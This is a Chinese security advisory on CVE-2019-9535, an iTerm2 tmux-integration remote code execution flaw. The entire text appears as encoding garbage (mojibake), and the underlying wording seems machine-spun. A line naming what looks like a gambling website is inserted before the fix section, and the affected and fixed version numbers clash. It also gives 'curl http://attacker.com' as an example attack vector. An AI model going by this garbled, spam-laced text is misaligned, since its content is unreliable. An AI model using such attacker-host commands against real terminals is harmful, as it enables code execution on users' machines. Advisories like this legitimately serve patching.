iTerm2Ô¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-10-10

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-9535£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜÎó²îÓ°Ïì


Îó²î¸ÅÊö


iTerm2 ÊÇÈ«Çò×îÈÈÃŵÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬£¬£¬ÊÇ¿ª·¢Ö°Ô±¾­³£Ê¹ÓÃµÄ MacOS Öն˹¤¾ß£¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈÈÃÅ¿ªÔ´¹¤¾ßÌæ»»Æ·Ö®Ò»£¬£¬£¬±»Ðí¶à¿ª·¢Ö°Ô±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£


iTerm2¹Ù·½Ðû²¼ÁËÇå¾²¸üÐÂÐÞ¸´ÁËÒ»¸öÖÁÉÙ±£´æ7ÄêµÄÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬Õâ¸öÎó²îÔ´×Ô iTerm2 ÖÐµÄ tmux ¼¯ÀÖ³ÉÄÜ¡£¡£¡£Tumx Ó¦ÓóÌÐòÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬£¬£¬¿ÉÔÊÐí´Óµ¥¸ö×°±¸½¨Éè²¢¿ØÖƶà¸öÖÕ¶Ë¡£¡£¡£


¹¥»÷Õß¿ÉÒÔÔÚÓû§µÄÖն˱¬·¢Êä³ö£¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿°üÀ¨Í¨¹ý ssh ÅþÁ¬ÖÁ¶ñÒâЧÀÍÆ÷£¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×Ù°üÀ¨Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£ÔÚÐí¶àÇéÐÎÏÂÄܹ»ÔÚÓû§ÅÌËã»úÉÏÖ´ÐÐÏÂÁî¡£¡£¡£


Îó²îÑéÖ¤


ÍâÑóµÄRadially Open SecurityÒѾ­·Å³öÎó²îʹÓÃÀֳɵÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÅþÁ¬µ½¶ñÒâ SSH ЧÀÍÆ÷Ö®ºó£¬£¬£¬ÔÚ»úеÉÏÖ´Ðз­¿ªÒ»¸öÅÌËãÆ÷ÏÂÁîµÄPoC ÊÓÆµ¡£¡£¡£


¿­·¢¡¤k8(ÖйúÓÎ)¹Ù·½ÍøÕ¾



ÐÞ¸´½¨Òé


¹Ù·½ÒѾ­ÍƳöÇå¾²¸üУ¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/